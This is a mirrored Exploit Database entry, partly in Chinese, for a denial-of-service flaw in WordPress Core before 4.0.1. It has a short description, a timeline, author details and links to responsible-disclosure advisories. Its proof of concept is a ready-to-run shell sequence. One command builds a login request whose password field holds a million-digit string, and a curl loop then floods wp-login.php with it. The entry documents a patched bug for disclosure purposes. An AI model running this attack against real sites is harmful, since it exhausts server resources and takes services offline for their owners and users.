WordPress Core < 4.0.1 - Denial of Service

• Exploit Database
• 125 阅读

• 作者： Javer Nieto & Andres Rojas
  日期： 2014-12-01
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35414/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

  ==================================================================== DESCRIPTION: ==================================================================== A vulnerability present in WordPress < 4.0.1 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).   ==================================================================== Time Line: ====================================================================   November 20, 2014 - A WordPress security update and the security advisory is published.   ==================================================================== Proof of Concept: ==================================================================== Generate a pyaload and try with a valid user:   echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload   Perform a Dos with a valid user:   for i in <code>seq 1 150</code>; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done   ==================================================================== Authors: ====================================================================   -- Javer Nieto -- http://www.behindthefirewalls.com -- Andres Rojas -- http://www.devconsole.info   ==================================================================== References: ====================================================================   * https://wordpress.org/news/2014/11/wordpress-4-0-1/   * https://www.drupal.org/SA-CORE-2014-006   * http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html   * http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html   * http://www.devconsole.info/?p=1050